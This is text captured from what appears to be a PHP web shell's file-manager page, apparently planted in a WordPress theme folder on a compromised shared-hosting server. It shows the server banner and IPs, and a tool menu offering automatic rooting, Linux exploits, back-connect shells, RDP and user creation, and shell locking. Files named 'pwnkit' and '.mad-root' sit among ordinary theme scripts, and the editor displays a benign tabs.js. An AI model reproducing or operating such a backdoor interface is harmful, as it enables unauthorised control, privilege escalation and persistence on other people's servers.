Linux webd002.cluster130.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
Apache
: 10.130.40.2 | : 216.73.217.172
Cant Read [ /etc/named.conf ]
8.3.31
espacpq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
espacpq /
www /
wp-content /
themes /
alpha /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
vendor
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
accordion.js
687
B
-rw-r--r--
buttons.js
858
B
-rw-r--r--
customizer.js
1018
B
-rw-r--r--
navigation.js
2.22
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
slider.js
1008
B
-rw-r--r--
tabs.js
791
B
-rw-r--r--
video-popup.js
1.92
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tabs.js
( function ( $ ) { const $nav = $( ".alpha-tabs-nav" ); const $navLeft = $nav.offset().left; const $navIndicator = $( ".alpha-tabs-nav .indicator" ); const $navLinks = $( ".alpha-tabs-nav a" ); const $navTabs = $( ".alpha-tabs-single" ); $navLinks .on( "click", function ( event ) { event.preventDefault(); $navLinks.not( this ).removeClass( "selected" ); $( this ).addClass( "selected" ); const image = $( this ).find( "img" ); const imageLeft = image.offset().left - $navLeft; $navIndicator.css( "left", imageLeft ); const id = $( this ).data( "id" ); console.log( id ); const $newTab = $navTabs.filter( '[data-id="' + id + '"]' ); console.log( $newTab ); $navTabs.hide(); $newTab.show(); } ) .eq( 0 ) .trigger( "click" ); } )( jQuery );
Close